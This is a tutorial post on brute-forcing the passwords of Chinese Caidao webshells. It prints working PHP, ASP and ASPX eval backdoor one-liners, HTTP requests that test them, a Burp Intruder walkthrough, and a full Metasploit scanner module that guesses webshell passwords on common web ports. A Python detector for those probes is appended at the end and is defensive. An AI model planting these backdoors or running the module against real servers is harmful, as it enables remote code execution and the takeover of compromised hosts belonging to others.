Metasploit - crack chinese caidao php backdoor

This article shows how to crack PHP, ASP and ASPX Caidao backdoors with tools such as Burp Suite and Metasploit, and walks through cracking a Caidao PHP backdoor step by step.

Backdoor Request


PHP Backdoor:

    <?php @eval($_POST["op"]);?>

HTTP Request:

    POST /bk.php
    ....
    op=phpinfo();

If it succeeds, the phpinfo page is returned.

ASP Backdoor:
    <%eval request("op")%>

HTTP Request:

    POST /bk.asp
    op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response.end")

If it succeeds, the page shows 'woo5woo' (Len("admin") is 5).

ASPX Backdoor:
    <%@ Page Language="Jscript"%><%eval(Request.Item["op"],"unsafe");%>

HTTP Request:

    POST /bk.aspx
    op=Response.Write("woo");Response.Write(1+4);Response.Write("woo")

If it succeeds, the page shows 'woo5woo'.


Crack a php backdoor


For example, we will crack a Caidao PHP backdoor step by step.

1. We create an HTML login form to learn how the PHP backdoor is used.

Click the label called "Click Here", and the HTTP request appears in Burp Suite.

Send it to Intruder and mark "adminadmin" (the POST parameter name, which is the Caidao password) as the Intruder payload position.

Bingo! The password is 'adminadmin'. Now we can do the same with Metasploit as follows.

Crack backdoors with metasploit


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::AuthBrute

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Chinese Caidao Backdoor Bruteforce',
      'Description'    => 'This module attempts to brute chinese caidao php/asp/aspx backdoor.',
      'Author'         => [ 'Nixawk' ],
      'References'     =>
        [
          [ 'URL', 'http://blog.youkuaiyun.com/nixawk/article/details/40430329']
        ],
      'License'        => MSF_LICENSE
    ))

    register_options([
      OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),
      OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ]),
      OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])
    ], self.class)

    register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])
  end

  def backdoor_brute(uri, user, pass, payload, match)
    begin
      # Caidao's password is the name of the POST parameter that carries the code,
      # so every guess is sent as "<pass>=<payload>"; vars_post URL-encodes the payload.
      res = send_request_cgi({
        'uri'       => uri,
        'method'    => 'POST',
        'vars_post' => { 'user' => user, pass => payload }
      })
    rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
      print_error("#{peer} - Service failed to respond")
      return :abort
    end

    vprint_status("#{peer} - brute force caidao password: \"#{pass}\"")

    # Only the real password makes the shell evaluate the payload, which echoes
    # "<junk><length of junk><junk>" into the response body.
    if res && res.code == 200 && res.body =~ /#{match}/mi
      print_good("#{peer} - Successful login: password - \"#{pass}\"")
      return :next_user
    end

    nil
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path)
    script_type = datastore['TYPE']

    # Random 4-character marker; a successful eval echoes marker, its length (4), marker.
    junk = Rex::Text.rand_text_alphanumeric(4)
    match = "#{junk}4#{junk}"

    case script_type
    when /php$/mi
      payload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";"

    when /asp$/mi
      # VBScript: Len() returns the marker length
      payload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"

    when /aspx$/mi
      # The ASPX shell evaluates JScript, which has no Len(); use the string's .length
      payload = "Response.Write(\"#{junk}\");Response.Write(\"#{junk}\".length);Response.Write(\"#{junk}\")"

    else
      print_error("#{peer} - Backdoor type is not supported")
      return
    end

    each_user_pass { |user, pass|
      backdoor_brute(uri, user, pass, payload, match)
    }
  end
end
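As an added defender-side example (not code from the post or from the Metasploit module above), the following Python flags the probe bodies shown in the Backdoor Request section and the brute-force pattern the module produces: the guessed password is the POST parameter name, so one client sending many distinct probe-carrying parameter names to one URI is the signature. The sample requests, the marker `aB3x`, the client addresses and the threshold of 3 are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlencode

# Signatures for the probe bodies on this page: a phpinfo() check, and the module's
# marker echo, where one random alphanumeric token is written, its length is written,
# and the token is written again (PHP echo, ASP response.write/Len, ASPX Response.Write).
# The same quoted token appearing twice is what all three variants share.
PROBE_PATTERNS = [
    re.compile(r"\bphpinfo\s*\(", re.I),
    re.compile(r"\"+([A-Za-z0-9]{4,})\"+.*\1", re.S),   # same token quoted twice
    re.compile(r"\b(echo|response\.write|execute|eval)\b", re.I),
]

def is_probe(value):
    """True when a single POST parameter value looks like a Caidao probe payload."""
    hits = sum(1 for p in PROBE_PATTERNS if p.search(value))
    # phpinfo alone is enough; otherwise require both the token echo and a keyword
    return bool(PROBE_PATTERNS[0].search(value)) or hits >= 2

def detect(posts, threshold=3):
    """posts: iterable of (client_ip, uri, urlencoded_body).
    Returns (probes, bruteforce): every (ip, uri, param_name) carrying a probe, and
    the (ip, uri) targets where >= threshold distinct names carried one. Each Caidao
    password guess is a new parameter name; a real form posts the same names each time."""
    probes = []
    names_by_target = defaultdict(set)
    for ip, uri, body in posts:
        for name, value in parse_qsl(body, keep_blank_values=True):
            if is_probe(value):
                probes.append((ip, uri, name))
                names_by_target[(ip, uri)].add(name)
    bruteforce = {t: n for t, n in names_by_target.items() if len(n) >= threshold}
    return probes, bruteforce

# Constructed sample traffic (not captured data): the page's phpinfo check, three
# password guesses in the module's PHP/ASP/ASPX formats, and one ordinary login.
MARK = "aB3x"
SAMPLE_POSTS = [
    ("10.0.0.5", "/bk.php", urlencode({"op": "phpinfo();"})),
    ("10.0.0.5", "/bk.php", urlencode({"user": "u", "admin": f'$_="4";echo "{MARK}".$_."{MARK}";'})),
    ("10.0.0.5", "/bk.php", urlencode({"user": "u", "pass": f'execute("response.write(""{MARK}""):response.write(Len(""{MARK}"")):response.end")'})),
    ("10.0.0.5", "/bk.php", urlencode({"user": "u", "root": f'Response.Write("{MARK}");Response.Write(4);Response.Write("{MARK}")'})),
    ("10.0.0.9", "/login.php", urlencode({"user": "alice", "password": "S3cret!"})),
]

if __name__ == "__main__":
    probes, brute = detect(SAMPLE_POSTS)
    for hit in probes: print("probe", *hit)
    for (ip, uri), names in brute.items(): print("bruteforce", ip, uri, sorted(names))
```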

